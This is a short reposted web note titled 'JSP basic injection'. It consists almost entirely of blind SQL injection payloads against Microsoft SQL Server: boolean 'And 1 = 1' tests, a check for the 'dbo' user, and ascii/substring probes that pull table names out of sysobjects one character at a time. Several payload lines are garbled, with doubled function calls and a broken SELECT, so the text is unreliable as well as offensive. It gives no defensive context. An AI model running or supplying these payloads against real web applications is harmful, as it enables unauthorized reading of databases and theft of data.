JSP basic injection

xiaoxiao2021-03-06  17

testing method

And 1 = 1

And 1 = 2

And user_name () = 'dbo'

And ascii (Substring (Substring (Select Top 1 Name from sysobjects where xtype = 'u'), 1, 1)))> 109

And ascii (Substring (Substring (Substring 1 Name from sysobjects where xtype = 'u'), 1, 1))> 111

And ASCII (Lower (Substring (Substring (Select Top 1 Name from sysobjects where xtype = 'u'), 1, 1))) = 111

..............................

.........................

.............................

转载请注明原文地址:https://www.9cbs.com/read-45454.html

New Post(0)